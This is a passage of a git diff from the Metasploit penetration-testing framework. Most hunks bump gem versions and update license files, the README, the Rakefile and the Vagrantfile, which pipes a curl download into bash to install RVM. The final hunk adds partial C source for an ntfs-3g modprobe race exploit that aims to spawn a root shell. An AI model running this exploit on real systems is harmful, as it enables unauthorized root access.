-      rack-test (>= 0.5.4)
-      xpath (~> 2.0)
-    childprocess (0.5.9)
-      ffi (~> 1.0, >= 1.0.11)
+    bcrypt_pbkdf (1.0.0)
+    bindata (2.4.0)
+    bit-struct (0.16)
+    builder (3.2.3)
    coderay (1.1.1)
-    contracts (0.14.0)
-    cucumber (2.4.0)
-      builder (>= 2.1.2)
-      cucumber-core (~> 1.5.0)
-      cucumber-wire (~> 0.0.1)
-      diff-lcs (>= 1.1.3)
-      gherkin (~> 4.0)
-      multi_json (>= 1.7.5, < 2.0)
-      multi_test (>= 0.1.2)
-    cucumber-core (1.5.0)
-      gherkin (~> 4.0)
-    cucumber-rails (1.4.5)
-      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 4)
-      mime-types (>= 1.16, < 4)
-      nokogiri (~> 1.5)
-      railties (>= 3, < 5.1)
-    cucumber-wire (0.0.1)
-    diff-lcs (1.2.5)
+    diff-lcs (1.3)
+    dnsruby (1.60.2)
    docile (1.1.5)
    erubis (2.7.0)
-    factory_girl (4.7.0)
+    factory_girl (4.8.0)
      activesupport (>= 3.0.0)
-    factory_girl_rails (4.7.0)
-      factory_girl (~> 4.7.0)
+    factory_girl_rails (4.8.0)
+      factory_girl (~> 4.8.0)
      railties (>= 3.0.0)
-    faraday (0.10.0)
+    faraday (0.13.1)
      multipart-post (>= 1.2, < 3)
-    ffi (1.9.14)
+    ffi (1.9.18)
    filesize (0.1.1)
-    fivemat (1.3.2)
-    gherkin (4.0.0)
-    i18n (0.7.0)
-    jsobfu (0.4.1)
-      rkelly-remix (= 0.0.6)
-    json (1.8.3)
+    fivemat (1.3.5)
+    hashery (2.1.2)
+    i18n (0.8.6)
+    jsobfu (0.4.2)
+      rkelly-remix
+    json (2.1.0)
    loofah (2.0.3)
      nokogiri (>= 1.5.9)
-    metasm (1.0.2)
-    metasploit-concern (2.0.3)
+    metasm (1.0.3)
+    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (2.0.8)
+    metasploit-credential (2.0.12)
      metasploit-concern
      metasploit-model
      metasploit_data_models
      pg
      railties
+      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (2.0.3)
+    metasploit-model (2.0.4)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.2.1)
-    metasploit_data_models (2.0.9)
+    metasploit-payloads (1.3.1)
+    metasploit_data_models (2.0.15)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -180,32 +161,33 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.2)
+    metasploit_payloads-mettle (0.2.2)
    method_source (0.8.2)
-    mime-types (3.1)
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2016.0521)
-    mini_portile2 (2.1.0)
-    minitest (5.9.1)
-    msgpack (1.0.2)
-    multi_json (1.12.1)
-    multi_test (0.1.2)
+    mini_portile2 (2.2.0)
+    minitest (5.10.3)
+    msgpack (1.1.0)
    multipart-post (2.0.0)
    nessus_rest (0.1.6)
-    net-ssh (3.2.0)
-    network_interface (0.0.1)
-    nokogiri (1.6.8.1)
-      mini_portile2 (~> 2.1.0)
-    octokit (4.6.2)
+    net-ssh (4.1.0)
+    network_interface (0.0.2)
+    nexpose (6.1.1)
+    nokogiri (1.8.0)
+      mini_portile2 (~> 2.2.0)
+    octokit (4.7.0)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.1)
    openvas-omp (0.0.4)
-    packetfu (1.1.11)
-      network_interface (~> 0.0)
-      pcaprub (~> 0.12)
+    packetfu (1.1.13)
+      pcaprub
    patch_finder (1.0.2)
    pcaprub (0.12.4)
-    pg (0.19.0)
+    pdf-reader (2.0.0)
+      Ascii85 (~> 1.0.0)
+      afm (~> 0.2.1)
+      hashery (~> 2.0)
+      ruby-rc4
+      ttfunk
+    pg (0.20.0)
    pg_array_parser (0.0.9)
    postgres_ext (3.0.0)
      activerecord (>= 4.0.0)
@@ -215,137 +197,151 @@ GEM
      coderay (~> 1.1.0)
      method_source (~> 0.8.1)
      slop (~> 3.4)
-    public_suffix (2.0.4)
-    rack (1.6.5)
+    public_suffix (3.0.0)
+    rack (1.6.8)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
      activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.7)
+    rails-dom-testing (1.0.8)
      activesupport (>= 4.2.0.beta, < 5.0)
-      nokogiri (~> 1.6.0)
+      nokogiri (~> 1.6)
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.3)
      loofah (~> 2.0)
-    railties (4.2.7.1)
-      actionpack (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    railties (4.2.9)
+      actionpack (= 4.2.9)
+      activesupport (= 4.2.9)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (11.3.0)
-    rb-readline-r7 (0.5.2.0)
-    recog (2.1.0)
+    rake (12.0.0)
+    rb-readline (0.5.5)
+    rbnacl (4.0.2)
+      ffi
+    rbnacl-libsodium (1.0.13)
+      rbnacl (>= 3.0.1)
+    recog (2.1.12)
      nokogiri
-    redcarpet (3.3.4)
-    rex-arch (0.1.2)
+    redcarpet (3.4.0)
+    rex-arch (0.1.11)
      rex-text
-    rex-bin_tools (0.1.1)
+    rex-bin_tools (0.1.4)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.3)
-    rex-encoder (0.1.1)
+    rex-core (0.1.12)
+    rex-encoder (0.1.4)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.3)
+    rex-exploitation (0.1.14)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
-    rex-java (0.1.3)
-    rex-mime (0.1.1)
+    rex-java (0.1.5)
+    rex-mime (0.1.5)
      rex-text
-    rex-nop (0.1.0)
+    rex-nop (0.1.1)
      rex-arch
-    rex-ole (0.1.3)
+    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.68)
+    rex-powershell (0.1.72)
      rex-random_identifier
      rex-text
-    rex-random_identifier (0.1.1)
+    rex-random_identifier (0.1.3)
      rex-text
-    rex-registry (0.1.1)
-    rex-rop_builder (0.1.1)
+    rex-registry (0.1.3)
+    rex-rop_builder (0.1.3)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.2)
+    rex-socket (0.1.8)
+      rex-core
+    rex-sslscan (0.1.5)
      rex-core
-    rex-sslscan (0.1.1)
      rex-socket
      rex-text
-    rex-struct2 (0.1.0)
-    rex-text (0.2.9)
-    rex-zip (0.1.1)
+    rex-struct2 (0.1.2)
+    rex-text (0.2.15)
+    rex-zip (0.1.3)
      rex-text
-    rkelly-remix (0.0.6)
-    robots (0.10.1)
-    rspec-core (3.5.4)
-      rspec-support (~> 3.5.0)
-    rspec-expectations (3.5.0)
+    rkelly-remix (0.0.7)
+    rspec (3.6.0)
+      rspec-core (~> 3.6.0)
+      rspec-expectations (~> 3.6.0)
+      rspec-mocks (~> 3.6.0)
+    rspec-core (3.6.0)
+      rspec-support (~> 3.6.0)
+    rspec-expectations (3.6.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.5.0)
-    rspec-mocks (3.5.0)
+      rspec-support (~> 3.6.0)
+    rspec-mocks (3.6.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.5.0)
-    rspec-rails (3.5.2)
+      rspec-support (~> 3.6.0)
+    rspec-rails (3.6.1)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
-      rspec-core (~> 3.5.0)
-      rspec-expectations (~> 3.5.0)
-      rspec-mocks (~> 3.5.0)
-      rspec-support (~> 3.5.0)
-    rspec-support (3.5.0)
-    rubyntlm (0.6.1)
-    rubyzip (1.2.0)
+      rspec-core (~> 3.6.0)
+      rspec-expectations (~> 3.6.0)
+      rspec-mocks (~> 3.6.0)
+      rspec-support (~> 3.6.0)
+    rspec-rerun (1.1.0)
+      rspec (~> 3.0)
+    rspec-support (3.6.0)
+    ruby-rc4 (0.1.5)
+    ruby_smb (0.0.18)
+      bindata
+      rubyntlm
+      windows_error
+    rubyntlm (0.6.2)
+    rubyzip (1.2.1)
    sawyer (0.8.1)
      addressable (>= 2.3.5, < 2.6)
      faraday (~> 0.8, < 1.0)
-    shoulda-matchers (3.1.1)
-      activesupport (>= 4.0.0)
-    simplecov (0.12.0)
+    simplecov (0.15.0)
      docile (~> 1.1.0)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.0)
+    simplecov-html (0.10.2)
    slop (3.6.0)
-    sqlite3 (1.3.12)
-    sshkey (1.8.0)
-    thor (0.19.4)
-    thread_safe (0.3.5)
-    timecop (0.8.1)
-    tzinfo (1.2.2)
+    sqlite3 (1.3.13)
+    sshkey (1.9.0)
+    thor (0.20.0)
+    thread_safe (0.3.6)
+    timecop (0.9.1)
+    ttfunk (1.5.1)
+    tzinfo (1.2.3)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2016.10)
+    tzinfo-data (1.2017.2)
      tzinfo (>= 1.0.0)
-    windows_error (0.0.2)
-    xpath (2.0.0)
-      nokogiri (~> 1.3)
-    yard (0.9.5)
+    windows_error (0.1.2)
+    xdr (2.0.0)
+      activemodel (>= 4.2.7)
+      activesupport (>= 4.2.7)
+    xmlrpc (0.3.0)
+    yard (0.9.9)

 PLATFORMS
  ruby

 DEPENDENCIES
-  aruba
-  cucumber-rails
  factory_girl_rails
  fivemat
  metasploit-framework!
-  octokit (~> 4.0)
+  octokit
  pry
  rake
  redcarpet
  rspec-rails
-  shoulda-matchers
+  rspec-rerun
  simplecov
  timecop
  yard

 BUNDLED WITH
-   1.13.6
+   1.15.4
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2016, Rapid7, Inc.
+Copyright: 2006-2017, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -19,19 +19,6 @@ Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

-Files: data/john/*
-Copyright: 1996-2011 Solar Designer.
-License: GPL-2
-
-Files: external/pcaprub/*
-Copyright: 2007-2008, Alastair Houghton
-License: LGPL-2.1
-
-Files: external/ruby-kissfft/*
-Copyright: 2003-2010 Mark Borgerding
-           2009-2012 H D Moore <hdm[at]rapid7.com>
-License: BSD-3-clause
-
 Files: external/source/exploits/IE11SandboxEscapes/*
 Copyright: James Forshaw, 2014
 License: GPLv3
@@ -79,38 +66,18 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

-Files: lib/bit-struct.rb lib/bit-struct/*
-Copyright: 2005-2009, Joel VanderWerf
-License: Ruby
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1

-Files: lib/nessus/*
-Copyright: Vlatoko Kosturjak
-License: BSD-3-clause
-
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

-Files: lib/net/ssh.rb lib/net/ssh/*
-Copyright: 2008 Jamis Buck <jamis@37signals.com>
-License: MIT
-
-Files: lib/packetfu.rb lib/packetfu/*
-Copyright: 2008-2012 Tod Beardsley
-License: BSD-3-clause
-
 Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

-Files: lib/openvas/*
-Copyright: No copyright statement provided
-License: MIT
-
 Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby
@@ -119,22 +86,10 @@ Files: lib/rbmysql.rb lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

-Files: lib/rbreadline.rb
-Copyright: 2009 Park Heesob
-License: BSD-3-clause
-
-Files: lib/rkelly/*
-Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
-License: MIT
-
 Files: lib/snmp.rb lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

-Files: lib/sshkey.rb lib/sshkey/*
-Copyright: 2011 James Miller
-License: MIT
-
 Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause
@@ -151,132 +106,6 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT

-
-#
-# Gems
-#
-
-Files: activemodel
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: activerecord
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: activesupport
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: arel
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: bcrypt
-Copyright: 2007-2011 Coda Hale
-License: MIT
-
-Files: builder
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: database_cleaner
-Copyright: 2009 Ben Mabey
-License: MIT
-
-Files: diff-lcs
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: factory_girl
-Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
-License: MIT
-
-Files: fivemat
-Copyright: 2012 Tim Pope
-License: MIT
-
-Files: i18n
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: json
-Copyright: Daniel Luz <dev at mernen dot com>
-License: Ruby
-
-Files: metasploit_data_models
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: mini_portile
-Copyright: 2011 Luis Lavena
-License: MIT
-
-Files: msgpack
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: multi_json
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: network_interface
-Copyright: 2012, Rapid7, Inc.
-License: MIT
-
-Files: nokogiri
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: packetfu
-Copyright: 2008-2012 Tod Beardsley
-License: BSD-3-clause
-
-Files: pcaprub
-Copyright: 2007-2008, Alastair Houghton
-License: LGPL-2.1
-
-Files: pg
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: rake
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: redcarpet
-Copyright: 2009 Natacha Porté
-License: MIT
-
-Files: robots
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: rspec
-Copyright: 2009 Chad Humphries, David Chelimsky
-License: MIT
-
-Files: shoulda-matchers
-Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
-License: MIT
-
-Files: simplecov
-Copyright: 2010-2012 Christoph Olszowka
-License: MIT
-
-Files: timecop
-Copyright: 2012 Travis Jeffery, John Trupiano
-License: MIT
-
-Files: tzinfo
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
-Files: yard
-Copyright: 2007-2013 Loren Segal
-License: MIT
-
-
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -0,0 +1,130 @@
+This file is auto-generated by tools/dev/update_gem_licenses.sh
+Ascii85, 1.0.2, MIT
+actionpack, 4.2.9, MIT
+actionview, 4.2.9, MIT
+activemodel, 4.2.9, MIT
+activerecord, 4.2.9, MIT
+activesupport, 4.2.9, MIT
+addressable, 2.5.1, "Apache 2.0"
+afm, 0.2.2, MIT
+arel, 6.0.4, MIT
+arel-helpers, 2.4.0, unknown
+backports, 3.8.0, MIT
+bcrypt, 3.1.11, MIT
+bindata, 2.4.0, ruby
+bit-struct, 0.16, ruby
+builder, 3.2.3, MIT
+bundler, 1.15.1, MIT
+coderay, 1.1.1, MIT
+diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.60.1, "Apache 2.0"
+docile, 1.1.5, MIT
+erubis, 2.7.0, MIT
+factory_girl, 4.8.0, MIT
+factory_girl_rails, 4.8.0, MIT
+faraday, 0.12.1, MIT
+filesize, 0.1.1, MIT
+fivemat, 1.3.5, MIT
+google-protobuf, 3.3.0, "New BSD"
+googleauth, 0.5.1, "Apache 2.0"
+grpc, 1.4.1, "New BSD"
+hashery, 2.1.2, "Simplified BSD"
+i18n, 0.8.6, MIT
+jsobfu, 0.4.2, "New BSD"
+json, 2.1.0, ruby
+jwt, 1.5.6, MIT
+little-plugger, 1.1.4, MIT
+logging, 2.2.2, MIT
+loofah, 2.0.3, MIT
+memoist, 0.16.0, MIT
+metasm, 1.0.3, LGPL
+metasploit-aggregator, 0.2.1, "New BSD"
+metasploit-concern, 2.0.5, "New BSD"
+metasploit-credential, 2.0.10, "New BSD"
+metasploit-framework, 4.15.0, "New BSD"
+metasploit-model, 2.0.4, "New BSD"
+metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.15, "New BSD"
+metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
+method_source, 0.8.2, MIT
+mini_portile2, 2.2.0, MIT
+minitest, 5.10.2, MIT
+msgpack, 1.1.0, "Apache 2.0"
+multi_json, 1.12.1, MIT
+multipart-post, 2.0.0, MIT
+nessus_rest, 0.1.6, MIT
+net-ssh, 4.1.0, MIT
+network_interface, 0.0.1, MIT
+nexpose, 6.1.0, BSD
+nokogiri, 1.8.0, MIT
+octokit, 4.7.0, MIT
+openssl-ccm, 1.2.1, MIT
+openvas-omp, 0.0.4, MIT
+os, 0.9.6, MIT
+packetfu, 1.1.13, BSD
+patch_finder, 1.0.2, "New BSD"
+pcaprub, 0.12.4, LGPL-2.1
+pdf-reader, 2.0.0, MIT
+pg, 0.20.0, "New BSD"
+pg_array_parser, 0.0.9, unknown
+postgres_ext, 3.0.0, MIT
+pry, 0.10.4, MIT
+public_suffix, 2.0.5, MIT
+rack, 1.6.8, MIT
+rack-test, 0.6.3, MIT
+rails-deprecated_sanitizer, 1.0.3, MIT
+rails-dom-testing, 1.0.8, MIT
+rails-html-sanitizer, 1.0.3, MIT
+railties, 4.2.9, MIT
+rake, 12.0.0, MIT
+rb-readline, 0.5.4, BSD
+recog, 2.1.11, unknown
+redcarpet, 3.4.0, MIT
+rex-arch, 0.1.9, "New BSD"
+rex-bin_tools, 0.1.4, "New BSD"
+rex-core, 0.1.11, "New BSD"
+rex-encoder, 0.1.4, "New BSD"
+rex-exploitation, 0.1.14, "New BSD"
+rex-java, 0.1.5, "New BSD"
+rex-mime, 0.1.5, "New BSD"
+rex-nop, 0.1.1, "New BSD"
+rex-ole, 0.1.6, "New BSD"
+rex-powershell, 0.1.72, "New BSD"
+rex-random_identifier, 0.1.2, "New BSD"
+rex-registry, 0.1.3, "New BSD"
+rex-rop_builder, 0.1.3, "New BSD"
+rex-socket, 0.1.8, "New BSD"
+rex-sslscan, 0.1.4, "New BSD"
+rex-struct2, 0.1.2, "New BSD"
+rex-text, 0.2.15, "New BSD"
+rex-zip, 0.1.3, "New BSD"
+rkelly-remix, 0.0.7, MIT
+robots, 0.10.1, MIT
+rspec, 3.6.0, MIT
+rspec-core, 3.6.0, MIT
+rspec-expectations, 3.6.0, MIT
+rspec-mocks, 3.6.0, MIT
+rspec-rails, 3.6.0, MIT
+rspec-rerun, 1.1.0, MIT
+rspec-support, 3.6.0, MIT
+ruby-rc4, 0.1.5, MIT
+ruby_smb, 0.0.18, "New BSD"
+rubyntlm, 0.6.2, MIT
+rubyzip, 1.2.1, "Simplified BSD"
+sawyer, 0.8.1, MIT
+signet, 0.7.3, "Apache 2.0"
+simplecov, 0.14.1, MIT
+simplecov-html, 0.10.1, MIT
+slop, 3.6.0, MIT
+sqlite3, 1.3.13, "New BSD"
+sshkey, 1.9.0, MIT
+thor, 0.19.4, MIT
+thread_safe, 0.3.6, "Apache 2.0"
+timecop, 0.9.1, MIT
+ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.3, MIT
+tzinfo-data, 1.2017.2, MIT
+windows_error, 0.1.2, BSD
+xdr, 2.0.0, "Apache 2.0"
+xmlrpc, 0.3.0, ruby
+yard, 0.9.9, MIT
@@ -9,20 +9,19 @@ Bug tracking and development information can be found at:
 https://github.com/rapid7/metasploit-framework

 New bugs and feature requests should be directed to:
-  http://r-7.co/MSF-BUGv1
+  https://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
  https://rapid7.github.io/metasploit-framework/api

-Questions and suggestions can be sent to:
-  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

 Installing
 --

-Generally, you should use [the free installer](https://www.metasploit.com/download),
+Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -45,6 +44,6 @@ pull request. For slightly more information, see
 [wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
-[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -9,6 +9,20 @@ require 'metasploit/framework/spec/untested_payloads'
 # the user installs with `bundle install --without db`
 Metasploit::Framework::Require.optionally_active_record_railtie

+begin
+  require 'rspec/core'
+  require 'rspec-rerun/tasks'
+rescue LoadError
+  puts "rspec not in bundle, so can't set up spec tasks.  " \
+       "To run specs ensure to install the development and test groups."
+  puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'."
+  puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \
+       "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`"
+else
+  require 'rspec/core/rake_task'
+  RSpec::Core::RakeTask.new(spec: 'db:test:prepare')
+end
+
 Metasploit::Framework::Application.load_tasks
 Metasploit::Framework::Spec::Constants.define_task
 Metasploit::Framework::Spec::Threads::Suite.define_task
@@ -3,10 +3,7 @@

 Vagrant.configure(2) do |config|
  config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/trusty64"
-  # TODO: find a minimal image that keeps up-to-date and
-  # supports multiple providers
-  #config.vm.box = "phusion/ubuntu-14.04-amd64"
+  config.vm.box = "ubuntu/xenial64"
  config.vm.network :forwarded_port, guest: 4444, host: 4444
  config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -26,14 +23,14 @@ Vagrant.configure(2) do |config|
  [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
    "apt-get update",
    "apt-get dist-upgrade -y",
-    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
+    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
  ].each do |step|
    config.vm.provision "shell", inline: step
  end

  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
@@ -0,0 +1,196 @@
+#define _GNU_SOURCE
+#include <stdbool.h>
+#include <errno.h>
+#include <sys/inotify.h>
+#include <unistd.h>
+#include <err.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <sys/eventfd.h>
+#include <signal.h>
+#include <poll.h>
+#include <stdio.h>
+#include <sys/prctl.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <sys/utsname.h>
+
+int main(void) {
+  /* prevent shell from backgrounding ntfs-3g when stopped */
+  pid_t initial_fork_child = fork();
+  if (initial_fork_child == -1)
+    err(1, "initial fork");
+  if (initial_fork_child != 0) {
+    int status;
+    if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)
+      err(1, "waitpid");
+    execl("rootshell", "rootshell", NULL);
+    exit(0);
+  }
+
+  char buf[1000] = {0};
+  // Set up workspace with volume, mountpoint, modprobe config and module directory.
+  char template[] = "/tmp/ntfs_sploit.XXXXXX";
+  if (mkdtemp(template) == NULL)
+    err(1, "mkdtemp");
+  char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];
+  sprintf(volume, "%s/volume", template);
+  sprintf(mountpoint, "%s/mountpoint", template);
+  sprintf(modprobe_confdir, "%s/modprobe.d", template);
+  sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);
+  if (mkdir(volume, 0777) || mkdir(mountpoint, 0777) || mkdir(modprobe_confdir, 0777))
+    err(1, "mkdir");
+  int conffd = open(modprobe_conffile, O_WRONLY|O_CREAT, 0666);
+  if (conffd == -1)
+    err(1, "open modprobe config");
+  int suidfile_fd = open("rootshell", O_RDONLY);
+  if (suidfile_fd == -1)
+    err(1, "unable to open ./rootshell");
+  char modprobe_config[200];
+  sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);
+  if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))
+    errx(1, "modprobe config write failed");
+  close(conffd);
+  // module directory setup
+  char system_cmd[1000];
+  sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",
+    template, template);
+  if (system(system_cmd))
+    errx(1, "shell command failed");
+
+  // Set up inotify watch for /proc/mounts.
+  // Note: /proc/mounts is a symlink to /proc/self/mounts, so
+  // the watch will only see accesses by this process.
+  int inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
+    err(1, "unable to watch /proc/mounts");
+
+  // Set up inotify watch for /proc/filesystems.
+  // This can be used to detect whether we lost the race.
+  int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (fs_inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
+    err(1, "unable to watch /proc/filesystems");
+
+  // Set up inotify watch for /sbin/modprobe.
+  // This can be used to detect when we can release all our open files.
+  int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (modprobe_inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
+    err(1, "unable to watch /sbin/modprobe");
+
+  int do_exec_pipe[2];
+  if (pipe2(do_exec_pipe, O_CLOEXEC))
+    err(1, "pipe");
+  pid_t child = fork();
+  if (child == -1)
+    err(1, "fork");
+  if (child != 0) {
+    if (read(do_exec_pipe[0], buf, 1) != 1)
+      errx(1, "pipe read failed");
+    char modprobe_opts[300];
+    sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);
+    setenv("MODPROBE_OPTIONS", modprobe_opts, 1);
+    execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
+  }
+  child = getpid();
+
+  // Now launch ntfs-3g and wait until it opens /proc/mounts
+  if (write(do_exec_pipe[1], buf, 1) != 1)
+    errx(1, "pipe write failed");
+
+  if (read(inotify_fd, buf, sizeof(buf)) <= 0)
+    errx(1, "inotify read failed");
+  if (kill(getppid(), SIGSTOP))
+    err(1, "can't stop setuid parent");
+
+  // Check whether we won the main race.
+  struct pollfd poll_fds[1] = {{
+    .fd = fs_inotify_fd,
+    .events = POLLIN
+  }};
+  int poll_res = poll(poll_fds, 1, 100);
+  if (poll_res == -1)
+    err(1, "poll");
+  if (poll_res == 1) {
+    puts("looks like we lost the race");
+    if (kill(getppid(), SIGKILL))
+      perror("SIGKILL after lost race");
+    char rm_cmd[100];
+    sprintf(rm_cmd, "rm -rf %s", template);
+    system(rm_cmd);
+    exit(1);
+  }
+  puts("looks like we won the race");
+
+  // Open as many files as possible. Whenever we have
+  // a bunch of open files, move them into a new process.
+  int total_open_files = 0;
+  while (1) {
+    #define LIMIT 500
+    int open_files[LIMIT];
+    bool reached_limit = false;
+    int n_open_files;
+    for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {
+      open_files[n_open_files] = eventfd(0, 0);
+      if (open_files[n_open_files] == -1) {
+        if (errno != ENFILE)
+          err(1, "eventfd() failed");
+        printf("got ENFILE at %d total\n", total_open_files);
+        reached_limit = true;
+        break;
+      }
+      total_open_files++;
+    }
